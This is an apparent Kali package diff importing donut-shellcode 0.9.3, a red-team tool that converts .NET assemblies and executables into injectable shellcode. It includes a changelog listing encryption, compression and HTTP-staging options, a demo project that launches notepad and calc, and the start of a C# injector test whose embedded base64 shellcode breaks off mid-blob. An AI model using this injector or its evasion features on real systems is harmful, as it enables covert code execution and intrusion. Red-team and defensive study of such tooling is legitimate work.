Codebase list donut-shellcode / f38ff4a
Import upstream version 0.9.3 Kali Janitor 3 years ago
173 changed file(s) with 19046 addition(s) and 13198 deletion(s). Raw diff Collapse all Expand all
+252
-0
.gitignore less more
0 ## Ignore Visual Studio temporary files, build results, and
1 ## files generated by popular Visual Studio add-ons.
2
3 # User-specific files
4 *.suo
5 *.user
6 *.sln.docstates
7
8 # Build results
9 [Dd]ebug/
10 [Dd]ebugPublic/
11 [Rr]elease/
12 [Rr]eleases/
13 x64/
14 x86/
15 bld/
16 [Bb]in/
17 [Oo]bj/
18 build/
19
20 # Roslyn cache directories
21 *.ide/
22 .vs/
23
24 # MSTest test Results
25 [Tt]est[Rr]esult*/
26 [Bb]uild[Ll]og.*
27
28 # NUnit
29 *.VisualState.xml
30 TestResult.xml
31 nunit-*.xml
32
33 # Build Results of an ATL Project
34 [Dd]ebugPS/
35 [Rr]eleasePS/
36 dlldata.c
37
38 *_i.c
39 *_p.c
40 *_i.h
41 *.ilk
42 *.meta
43 *.obj
44 *.pch
45 *.pdb
46 *.pgc
47 *.pgd
48 *.rsp
49 *.sbr
50 *.tlb
51 *.tli
52 *.tlh
53 *.tmp
54 *.tmp_proj
55 *.log
56 *.vspscc
57 *.vssscc
58 .builds
59 *.pidb
60 *.svclog
61 *.scc
62
63 # Chutzpah Test files
64 _Chutzpah*
65
66 # Visual C++ cache files
67 ipch/
68 *.aps
69 *.ncb
70 *.opensdf
71 *.sdf
72 *.cachefile
73
74 # Visual Studio profiler
75 *.psess
76 *.vsp
77 *.vspx
78
79 # TFS 2012 Local Workspace
80 $tf/
81
82 # Guidance Automation Toolkit
83 *.gpState
84
85 # ReSharper is a .NET coding add-in
86 _ReSharper*/
87 *.[Rr]e[Ss]harper
88 *.DotSettings.user
89
90 # JustCode is a .NET coding addin-in
91 .JustCode
92
93 # TeamCity is a build add-in
94 _TeamCity*
95
96 # DotCover is a Code Coverage Tool
97 *.dotCover
98
99 # NCrunch
100 _NCrunch_*
101 .*crunch*.local.xml
102
103 # MightyMoose
104 *.mm.*
105 AutoTest.Net/
106
107 # Web workbench (sass)
108 .sass-cache/
109
110 # Installshield output folder
111 [Ee]xpress/
112
113 # DocProject is a documentation generator add-in
114 DocProject/buildhelp/
115 DocProject/Help/*.HxT
116 DocProject/Help/*.HxC
117 DocProject/Help/*.hhc
118 DocProject/Help/*.hhk
119 DocProject/Help/*.hhp
120 DocProject/Help/Html2
121 DocProject/Help/html
122
123 # Click-Once directory
124 publish/
125
126 # Publish Web Output
127 *.[Pp]ublish.xml
128 *.azurePubxml
129 # TODO: Comment the next line if you want to checkin your web deploy settings
130 # but database connection strings (with potential passwords) will be unencrypted
131 *.pubxml
132 *.publishproj
133
134 # NuGet Packages
135 *.nupkg
136 # The packages folder can be ignored because of Package Restore
137 **/packages/*
138 # except build/, which is used as an MSBuild target.
139 !**/packages/build/
140 # If using the old MSBuild-Integrated Package Restore, uncomment this:
141 #!**/packages/repositories.config
142 Packages.dgml
143
144 # Windows Azure Build Output
145 csx/
146 *.build.csdef
147
148 # Windows Store app package directory
149 AppPackages/
150
151 # Others
152 sql/
153 *.Cache
154 ClientBin/
155 [Ss]tyle[Cc]op.*
156 ~$*
157 *~
158 *.dbmdl
159 *.dbproj.schemaview
160 *.pfx
161 *.publishsettings
162 node_modules/
163
164 # RIA/Silverlight projects
165 Generated_Code/
166
167 # Backup & report files from converting an old project file
168 # to a newer Visual Studio version. Backup files are not needed,
169 # because we have git ;-)
170 _UpgradeReport_Files/
171 Backup*/
172 UpgradeLog*.XML
173 UpgradeLog*.htm
174
175 # SQL Server files
176 *.mdf
177 *.ldf
178
179 # Business Intelligence projects
180 *.rdl.data
181 *.bim.layout
182 *.bim_*.settings
183
184 # Microsoft Fakes
185 FakesAssemblies/
186
187 # =========================
188 # Operating System Files
189 # =========================
190
191 # OSX
192 # =========================
193
194 .DS_Store
195 .AppleDouble
196 .LSOverride
197
198 # Icon must end with two \r
199 Icon
200
201
202 # Thumbnails
203 ._*
204
205 # Files that might appear on external disk
206 .Spotlight-V100
207 .Trashes
208
209 # Directories potentially created on remote AFP share
210 .AppleDB
211 .AppleDesktop
212 Network Trash Folder
213 Temporary Items
214 .apdisk
215
216 # Windows
217 # =========================
218
219 # Windows image file caches
220 Thumbs.db
221 ehthumbs.db
222
223 # Folder config file
224 Desktop.ini
225
226 # Recycle Bin used on file shares
227 $RECYCLE.BIN/
228
229 # Windows Installer files
230 *.cab
231 *.msi
232 *.msm
233 *.msp
234
235 #OpenCover output
236 coverage.xml
237
238 #Msbuild binary log output
239 output.binlog
240
241 # KDiff3
242 *_BACKUP_*
243 *_BASE_*
244 *_LOCAL_*
245 *_REMOTE_*
246 *.orig
247
248 AkavacheSqliteLinkerOverride.cs
249 NuGetBuild
250 WiX.Toolset.DummyFile.txt
251 GitHubVS.sln.DotSettings
+3
-0
.gitmodules less more
0 [submodule "generators/go-donut"]
1 path = generators/go-donut
2 url = https://github.com/Binject/go-donut
+30
-0
CHANGELOG.md less more
0 # Changelog
1 All notable changes to this project will be documented in this file.
2
3 ## [0.9.3]
4
5 ### Added
6
7 * The -e switch can be used to disable entropy and/or encryption. Options are: 1=none, 2=generate random names, 3=generate random names + use symmetric encryption.
8 * The -z switch tells the builder to compress the input file. 1=none, 2=aPLib. On Windows, a further three algorithms are supported, which are 3=LZNT1, 4=Xpress and 5=Xpress Huffman.
9 * The -f switch specifies the output format for loader. 1=binary, 2=base64, 3=c, 4=ruby, 5=python, 6=powershell, 7=c# and 8=hex. On Windows, Base64 strings are copied to the clipboard.
10 * The -t switch tells the loader to run unmanaged entrypoint for EXE as a thread. This also attempts to intercept exit-related API in Import Address Table by replacing their pointers with the address of RtlExitUserThread.
11 * The -n switch can be used to specify name of module for HTTP staging. If entropy is enabled, this is generated randomly.
12 * The -s switch specifies the HTTP server to download module from.
13 * The -y switch tells loader to create a new thread for the loader and continues executing at a specific address or Original Entry Point (OEP). The address should be provided as a string in hexadecimal format.
14 * The -x switch can be used to specify how loader terminates. 1=exit thread, 2=exit process.
15 * The -p switch is used to specify parameters to .NET method, DLL function or command line for an unmanaged EXE file. Wrap multiple parameters inside quotations.
16 * The -w switch tells the loader to convert parameters to UNICODE before passing to unmanaged DLL function.
17 * C# generator by n1xbyte: https://github.com/n1xbyte/donutCS
18 * Go generator by awgh https://github.com/Binject/go-donut
19
20 ### Changed
21
22 * Command line is no longer parsed using semi-colon or comma as a token. The -p switch now accepts a string with all parameters enclosed in quotation marks. For .NET DLL/EXE, these are separated by the loader using CommandLineToArgvW. For unmanaged DLL, the string is passed to the DLL function without any modification.
23 * The -u switch to specify URL for HTTP stager is replaced with -s switch to prepare for a DNS stager.
24 * The -f switch to specify input file is now used to specify output format of loader.
25
26 ### Removed
27
28 * XSL files are no longer supported.
29 * Code stub for calling DLL function with multiple arguments.
+10
-0
DemoCreateProcess/Class1.cs less more
0 using System.Diagnostics;
1
2 public class TestClass
3 {
4 public static void RunProcess(string path, string path2)
5 {
6 Process.Start(path);
7 Process.Start(path2);
8 }
9 }
+51
-0
DemoCreateProcess/DemoCreateProcess.csproj less more
0 <Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
1 <PropertyGroup>
2 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
3 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
4 <ProjectGuid>{75C4A31E-6E99-4289-8701-EF0B6CD94435}</ProjectGuid>
5 <OutputType>Library</OutputType>
6 <NoStandardLibraries>false</NoStandardLibraries>
7 <AssemblyName>DemoCreateProcess</AssemblyName>
8 <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
9 <FileAlignment>512</FileAlignment>
10 </PropertyGroup>
11 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
12 <DebugSymbols>true</DebugSymbols>
13 <DebugType>full</DebugType>
14 <Optimize>false</Optimize>
15 <OutputPath>bin\Debug\</OutputPath>
16 <DefineConstants>DEBUG;TRACE</DefineConstants>
17 <ErrorReport>prompt</ErrorReport>
18 <WarningLevel>4</WarningLevel>
19 </PropertyGroup>
20 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
21 <DebugType>pdbonly</DebugType>
22 <Optimize>true</Optimize>
23 <OutputPath>bin\Release\</OutputPath>
24 <DefineConstants>TRACE</DefineConstants>
25 <ErrorReport>prompt</ErrorReport>
26 <WarningLevel>4</WarningLevel>
27 </PropertyGroup>
28 <PropertyGroup>
29 <RootNamespace>DemoCreateProcess</RootNamespace>
30 </PropertyGroup>
31 <ItemGroup>
32 <Reference Include="Microsoft.CSharp" />
33 <Reference Include="System" />
34 <Reference Include="System.Core" />
35 <Reference Include="System.Data" />
36 <Reference Include="System.Data.DataSetExtensions" />
37 <Reference Include="System.Xml" />
38 <Reference Include="System.Xml.Linq" />
39 </ItemGroup>
40 <ItemGroup>
41 <Compile Include="Class1.cs" />
42 </ItemGroup>
43 <ItemGroup>
44 <None Include="Readme.md" />
45 </ItemGroup>
46 <Import Project="$(MSBuildToolsPath)\Microsoft.CSHARP.Targets" />
47 <ProjectExtensions>
48 <VisualStudio AllowExistingFolder="true" />
49 </ProjectExtensions>
50 </Project>
+25
-0
DemoCreateProcess/DemoCreateProcess.sln less more
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "DemoCreateProcess.csproj", "{75C4A31E-6E99-4289-8701-EF0B6CD94435}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {75C4A31E-6E99-4289-8701-EF0B6CD94435}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {3A24F1AC-B24D-4029-9661-05CA11DAFC82}
23 EndGlobalSection
24 EndGlobal
+36
-0
DemoCreateProcess/Properties/AssemblyInfo.cs less more
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("DemoCreateProcess")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("DemoCreateProcess")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
+15
-0
DemoCreateProcess/Readme.md less more
0 # DemoCreateProcess
1
2 A simple C# program to use as a demo for testing shellcode. It takes two program names (such as notepad.exe,calc.exe) as parameters. You may generate shellcode for it using donut:
3
4 64-bit:
5
6 ```
7 .\donut.exe .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
8 ```
9
10 32-bit:
11
12 ```
13 .\donut.exe -a 1 .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p "notepad.exe calc.exe"
14 ```
+6
-0
DonutTest/App.config less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup>
3 <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/>
4 </startup>
5 </configuration>
+55
-0
DonutTest/DonutTest.csproj less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>DonutTest</RootNamespace>
9 <AssemblyName>DonutTest</AssemblyName>
10 <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
13 <Deterministic>true</Deterministic>
14 <TargetFrameworkProfile />
15 </PropertyGroup>
16 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 <PlatformTarget>AnyCPU</PlatformTarget>
18 <DebugSymbols>true</DebugSymbols>
19 <DebugType>full</DebugType>
20 <Optimize>false</Optimize>
21 <OutputPath>bin\Debug\</OutputPath>
22 <DefineConstants>DEBUG;TRACE</DefineConstants>
23 <ErrorReport>prompt</ErrorReport>
24 <WarningLevel>4</WarningLevel>
25 </PropertyGroup>
26 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 <PlatformTarget>AnyCPU</PlatformTarget>
28 <DebugType>pdbonly</DebugType>
29 <Optimize>true</Optimize>
30 <OutputPath>bin\Release\</OutputPath>
31 <DefineConstants>TRACE</DefineConstants>
32 <ErrorReport>prompt</ErrorReport>
33 <WarningLevel>4</WarningLevel>
34 <Prefer32Bit>false</Prefer32Bit>
35 </PropertyGroup>
36 <ItemGroup>
37 <Reference Include="System" />
38 <Reference Include="System.Core" />
39 <Reference Include="System.Xml.Linq" />
40 <Reference Include="System.Data.DataSetExtensions" />
41 <Reference Include="Microsoft.CSharp" />
42 <Reference Include="System.Data" />
43 <Reference Include="System.Net.Http" />
44 <Reference Include="System.Xml" />
45 </ItemGroup>
46 <ItemGroup>
47 <Compile Include="Program.cs" />
48 <Compile Include="Properties\AssemblyInfo.cs" />
49 </ItemGroup>
50 <ItemGroup>
51 <None Include="App.config" />
52 </ItemGroup>
53 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
54 </Project>
+31
-0
DonutTest/DonutTest.sln less more
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DonutTest", "DonutTest.csproj", "{3C9A6B88-BED2-4BA8-964C-77EC29BF1846}"
6 EndProject
7 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoCreateProcess", "..\DemoCreateProcess\DemoCreateProcess.csproj", "{4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}"
8 EndProject
9 Global
10 GlobalSection(SolutionConfigurationPlatforms) = preSolution
11 Debug|Any CPU = Debug|Any CPU
12 Release|Any CPU = Release|Any CPU
13 EndGlobalSection
14 GlobalSection(ProjectConfigurationPlatforms) = postSolution
15 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
16 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Debug|Any CPU.Build.0 = Debug|Any CPU
17 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.ActiveCfg = Release|Any CPU
18 {3C9A6B88-BED2-4BA8-964C-77EC29BF1846}.Release|Any CPU.Build.0 = Release|Any CPU
19 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
20 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Debug|Any CPU.Build.0 = Debug|Any CPU
21 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.ActiveCfg = Release|Any CPU
22 {4FCDF3A3-AEEF-43EA-9297-0D3BDE3BDAD2}.Release|Any CPU.Build.0 = Release|Any CPU
23 EndGlobalSection
24 GlobalSection(SolutionProperties) = preSolution
25 HideSolutionNode = FALSE
26 EndGlobalSection
27 GlobalSection(ExtensibilityGlobals) = postSolution
28 SolutionGuid = {E91D143E-AB90-41D2-942F-D3F1DC8352F3}
29 EndGlobalSection
30 EndGlobal
+12
-0
DonutTest/Hello.cs less more
0 // A Hello World! program in C#.
1 using System;
2 namespace HelloWorld
3 {
4 class Hello
5 {
6 static void Main()
7 {
8 Console.WriteLine("Hello World!");
9 }
10 }
11 }
+106
-0
DonutTest/Program.cs less more
0 /* Author: TheWover
1 Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls.
2 Last Modified: 11/1/2018
3 */
4 using System;
5 using System.Diagnostics;
6 using System.Runtime.InteropServices;
7
8 namespace ShellcodeTest
9 {
10 public class Program
11 {
12 static string x64 = @"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